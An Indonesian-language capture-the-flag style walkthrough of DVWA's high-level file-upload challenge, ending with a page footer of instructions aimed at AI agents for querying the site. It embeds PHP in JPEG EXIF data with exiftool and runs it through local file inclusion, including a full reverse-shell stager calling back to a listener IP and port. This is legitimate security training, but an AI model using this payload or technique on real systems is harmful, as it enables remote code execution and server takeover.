# High

Di bawah ini adalah *source-code* dari *file upload* level high di DVWA.

```php
vulnerabilities/upload/source/high.php
<?php
​
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
​
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
​
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {
​
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
​
?> 
```

## Mencari Informasi <a href="#mencari-informasi" id="mencari-informasi"></a>

Kali ini terdapat tambahan fungsi [`getimagesize()`](https://www.geeksforgeeks.org/php-getimagesize-function/) pada validasi yang digunakan untuk memastikan bahwa file yang di-upload user memang lah gambar.

Menurut sepengetahuan saya saat ini, kali ini kita tidak bisa mem-*bypass* file *non-image* lagi.

Setelah berhari-hari mencari solusi, akhirnya saya menemukan jawabannya, yaitu dengan menyisipkan *script* PHP ke dalam EXIF data dari file gambar. Lalu gambar tersebut di-upload ke server target, dan selanjutnya *script* tersebut dijalankan melalui celah *local file inclusion*.

## Melakukan Serangan <a href="#melakukan-serangan" id="melakukan-serangan"></a>

**Pertama-tama**, siapkan gambar apa pun lalu sisipkan *script* menggunakan [EXIFTOOL](https://exiftool.org/) seperti berikut:

```
exiftool -DocumentName="<?php phpinfo(); die(); ?>" kucing.jpg  
```

Hasilnya, *script* tersebut telah tersimpan di *header* `Document Name` pada file gambar:

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M00ui-BVGD011QicTVN%2Fimage.png?alt=media\&token=37754eb9-ae85-4fd3-9c35-0359ed41830e)

Jika kita mencoba menjalan *script* tersebut melalui PHP CLI, maka akan tampil seperti berikut:

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M00utc2SI2wMVU3v4Q1%2Fimage.png?alt=media\&token=22b0b54c-1747-4334-b0a0-f85ead4c8ec1)

Oke mantap! Selanjutnya, upload file tersebut lalu akses file tersebut melalui celah *local file inclusion*, dan hasilnya akan seperti berikut:

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M00vZd41rlDUP2rXrHr%2Fimage.png?alt=media\&token=91aab757-52ad-4271-ac0c-76e316277b6d)

Terlihat fungsi [`phpinfo()`](https://www.php.net/manual/en/function.phpinfo.php) berhasil dijalankan. Dan selanjutnya kita akan mencoba melakukan *reverse shell* seperti pada level sebelumnya.

### Melakukan Backconnect <a href="#melakukan-backconnect" id="melakukan-backconnect"></a>

Pertama-tama, buat shell menggunakan msfvenom seperti pada level sebelumnya.

Selanjutnya kita sisipkan shell tersebut ke dalam EXIF data gambar, seperti berikut:

```bash
exiftool -DocumentName='<?php /**/ error_reporting(0); $ip = "172.17.0.1"; $port = 1337; if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") && ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } else { eval($b); } die(); __halt_compiler();' kucing.jpg
```

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M01-mOiJ9Il0DhuW-Nx%2Fimage.png?alt=media\&token=7a5252b7-5f7a-411f-8bc8-364ed3668a1d)

Pastikan komputer kita (sebagai peretas) telah menjadi *listener* dari *backconnect* tersebut. Lalu, upload file gambar tersebut dan akses melalui celah *local file inclusion*.

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M010J72b_SdPjT8wUJK%2Fimage.png?alt=media\&token=472290a5-2897-42cd-aaa4-766a59a77938)

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M010j22RacJaF4gX-nM%2Fimage.png?alt=media\&token=35a4e480-a481-43f5-b94f-0e481048cc78)

Jika berhasil, akan tampak seperti gambar di atas. Selamat! 😁

Huft! Banyak pengalaman yang menarik bagi saya di sini. Tetap semangat!

Happy Hacking! 🍻


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.anggipradana.com/tutorial/dvwa/untitled-2/high.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.